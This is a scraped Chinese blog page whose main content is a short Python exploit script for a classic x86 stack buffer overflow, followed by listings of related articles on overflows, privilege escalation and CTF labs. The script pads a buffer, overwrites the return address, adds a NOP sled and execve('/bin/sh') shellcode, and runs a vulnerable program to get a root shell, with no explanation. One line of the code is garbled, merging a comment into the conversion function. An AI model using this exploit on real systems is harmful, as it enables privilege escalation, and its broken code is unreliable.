Python经典栈缓冲区溢出获取root权限

最新推荐文章于 2023-03-16 13:17:40 发布
最新推荐文章于 2023-03-16 13:17:40 发布
阅读量2.5k 收藏 5
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dajitui2024/article/details/79396339
版权

是Python2还是3我给忘记了,大家自己试试吧。

#!/usr/bin/env python
#-*-coding:utf-8-*-
#exp.py

import struct
from subprocess import call
#Stack address where shellcode is copied.
ret_addr = 0xbffff1d0

#Spawn a shell
#execve(/bin/sh)
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
#endianess convertion
def conv(num):
 return struct.pack("<I",numnk + RA + NOP's + Shellcode
buf = "A" * 268
buf += conv(ret_addr)
buf += "\x90" * 100
buf += scode
print "Calling vulnerable program"
call(["./vuln", buf])
怀揣梦想的大鸡腿
关注
专栏目录
缓冲区溢出原理.doc
05-03
防范溢出攻击的策略有多种,例如使用安全的编程语言,例如 Java 或 Python,这些语言具有内置的安全机制,可以防止缓冲区溢出攻击。另外,程序员也可以使用安全的编程实践,例如检查数组的边界,使用安全的函数库等...
基于Python缓冲区溢出漏洞利用实验 报告+代码
毕业作品网站
05-15 1243
实验四、缓冲区溢出漏洞利用实验 目录 实验四、缓冲区溢出漏洞利用实验 1 一.溢出点定位方法 1 当长度未超过缓冲区时, 1 当长度超过缓冲区时 2 二.漏洞利用方法(给出攻击发生时的布局) 3 三.DEP 保护绕过方法及实现 3 DEP 保护 3 ROP 原理 3 VirtualProtect 简介 4 实现步骤 4 四. shellcode 的设计与实现 5 五. 用于实现漏洞利用的“恶意”文件的结构与内容 6 junk 6 rop_chain 6 nops
python 无效的字符串或缓冲区长度 (0)_从shellcode学习到缓冲区溢出实战
weixin_33570610的博客
01-22 487
本文为看雪论坛优秀文章看雪论坛作者ID:techliu目录一、shellcode1.1 简介1.2 缓冲区溢出 溢出示例 规划缓冲区1.3 字符串转16进制脚本1.4 几种技巧 跳板技术 抬高顶保护shellcode二、windbg配置mona2.1 参考2.2 配置符号路径2.3 安装python2.4 配置windbg2.5 常用mona命令显示载入的模块 查找机器码2.6 在I...
Windows权限提升—溢出提权
剁椒鱼头没剁椒的博客
03-16 2824
这里需要我们了解的权限提升大概分为:后台权限,网站权限,数据本权限。接口权限,系统权限。域控权限等。此提权方法是利用系统本身存在的一些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对比systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以提权提升的exp。不过这里需要注意,只要对应的补丁号加上对应的系统的版本的提权exp才可以成功,有时候如果查找到提权exp提权不成功,那么就可以查看是不是系统版本没对应上,且不排除一些提权漏洞利用需要相应的环境
TryHackMe-进攻性渗透测试-16_缓冲区溢出
M1n9K1n9的博客
12-27 291
相对较难,需要有较好的计组底子缓冲区溢出基础:https://tryhackme.com/room/bof1关于国内的博客讲的非常好的一篇文章,讲的很透彻很仔细:https://www.cnblogs.com/02SWD/p/15952483.html。
Python脚本进阶】2.5、编写自己的0day概念验证代码:缓冲区溢出攻击、添加攻击关键元素、发送漏洞利用代码
07-31 634
Python脚本进阶】缓冲区溢出攻击、添加攻击关键元素、发送漏洞利用代码
uc-httpd-1.0.0-buffer-overflow-exploit:uc-httpd 1.0.0缓冲区溢出漏洞利用PoC
05-10
uc-httpd-1.0.0-buffer-overflow-exploit [熊麦uc-httpd 1.0.0缓冲区溢出漏洞利用概念证明] 概念证明代码:0dayPoC.py CVE-2018-10088 感谢CVE分配团队为构建以下内容提供的帮助: [描述] 通过XiongMai uc-httpd ...
课题-Python-MySQLdb-学习总结.docx
最新发布
07-20
然而,批量操作时需要考虑数据大小和服务器缓冲区容量,以免引起缓冲溢出等问题。 #### 七、示例代码 以下是一个简单的示例,展示了如何使用 MySQLdb 连接到 MySQL 数据库并执行基本操作: ```python import ...
课题-Python-MySQLdb-学习总结.doc.docx
01-09
但要注意,一次性发送过多数据可能导致服务器缓冲区溢出,因此可能需要分批执行。 7. **其他功能与扩展**:MySQLdb还提供了一些额外的函数和方法,可以通过`help()`查看。在实际使用中,可以根据需求进行封装,以...
PWN入门(2)利用缓冲区溢出绕过登录和第一个PwnTools脚本
Ba1_Ma0的博客
09-08 1355
有什么不会或者是错误的地方的可以私信我,看到必回。
StackAttack:利用基于堆缓冲区溢出Python程序
02-25
全面披露 我最近通过了OSCP考试,选择不使用我的工具。 进攻性安全性明确指出,他们不会对不允许使用的工具发表评论,因此我没有理会他们。 如果您选择在考试中使用此功能,则后果自负! StackAttack 用python3编写的工具,用于利用基于堆的简单缓冲区溢出。 该工具包含8个功能,可帮助利用缓冲区溢出漏洞。 我创建了此工具,以便为从事OSCP认证工作的人员节省更多时间。 由于更容易实现(即通过套接字发送ascii数据),因此我使用Python2来教我遇到的大多数缓冲区溢出资源。 如您所知,python2在2020年初是日落,现在有一天可能会从主流发行版中消失。 出于这个原因,我选择使用此工具跳到python3,并在此过程中学习一些新概念。 StackAttack要求在攻击者系统上和攻击者的路径上安装以下软件:metasploit-framework(检查发行版的repo或访问
渗透之——触发Easy File Sharing Web Server 7.2 HEAD缓冲区溢出Python脚本
冰河的专栏
01-16 8046
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86506264 脚本一: # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 2019-01-16 # Exploit Author...
红队渗透测试之Lord Of The Root——缓冲区溢出
qq_69775412的博客
09-13 1354
该项目是KookSec作者精心制作的项目环境,目标是获取获得root权限并找到flag.txt文本信息,这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电影《指环王》的概念,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。
python溢出_PWN简单堆溢出漏洞利用(一) | kTWO-个人博客
weixin_39652646的博客
12-06 489
摘要本文将详细讲述PWN二进制漏洞中简单的堆利用,本文将从原理开始讲述,然后层层深入,让读者从理解到动手操作,能够跟着教程完成所有操作。0x01 环境和程序准备安装有pwntools的kali Linux,安装教程可参考上一篇文章。gdb-peda工具,这个是gdb的插件这个可以百度一下安装和使用教程。IDA反汇编工具,可自行百度下载和学习使用方法,本文只做简单介绍。一个Linxu X86的含有...
python溢出_GDB调试之二溢出
weixin_39915820的博客
12-08 360
linux下应用程序中经常会发生段错误段错误基本上是由于访问非法内存所导致的如溢出、数组越界访问、malloc/free内存所引起的。在linux下发生段错误时会生成core dump核心转储文件里面记录了发生段错误时的函数调用关系。ubuntu14.04下默认发生段错误时并不产生核心转储文件需要额外的配置通过命令ulimit -c查看是否允许的core dump文件大小。如果只是临时需要用到可...
溢出攻击提权进入root shell
lyx2007825的专栏
11-11 4338
以前对溢出攻击只是一种感官上的,最近学了shellcode,决ding
防溢出提升权限攻击解决办法(转)
congjukun0600的博客
08-12 225
防溢出提升权限攻击解决办法(转)[@more@]  在骇客频频攻击、在系统漏洞层出不穷的今天,作为网络管理员、系统管理员的我们虽然在服务器的安全上都下了不少功夫:诸如,及时的打上系统安全补丁、进行一些常规的安全配置,但是仍然不...
缓冲区溢出漏洞
Masimaro的专栏
10-31 7190
缓冲区溢出的根本原因是冯洛伊曼体系的计算机并不严格的区分代码段和数据段,只是简单的根据eip的指向来决定哪些是代码,所以缓冲区溢出攻击都会通过某种方式修改eip的值,让其指向恶意代码。缓冲区溢出攻击一般分为堆缓冲区溢出攻击和缓冲区溢出攻击缓冲区溢出攻击缓冲区溢出攻击的一般是传入一个超长的带有shellcode的字符缓冲,覆盖中的EIP值,这样当函数执行完成返回后就会返回到有shellcode
python缓冲区溢出
03-06
Python缓冲区溢出是指在Python程序中,当向函数传递参数或者在函数内部创建局部变量时,如果超出了堆缓冲区的大小,就会导致溢出。这种情况可能会导致程序崩溃或者被攻击者利用来执行恶意代码。 Python的堆缓冲区溢出通常是由于递归调用或者大量局部变量导致的。当递归调用层级过深或者创建过多的局部变量时,堆的空间可能会被耗尽,从而导致溢出。 为了防止堆缓冲区溢出,可以采取以下几种措施: 1. 优化递归算法:尽量减少递归调用的层级,或者使用尾递归优化。 2. 减少局部变量的使用:尽量避免在函数内部创建过多的局部变量。 3. 使用循环代替递归:对于可以使用循环实现的逻辑,尽量使用循环代替递归调用。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值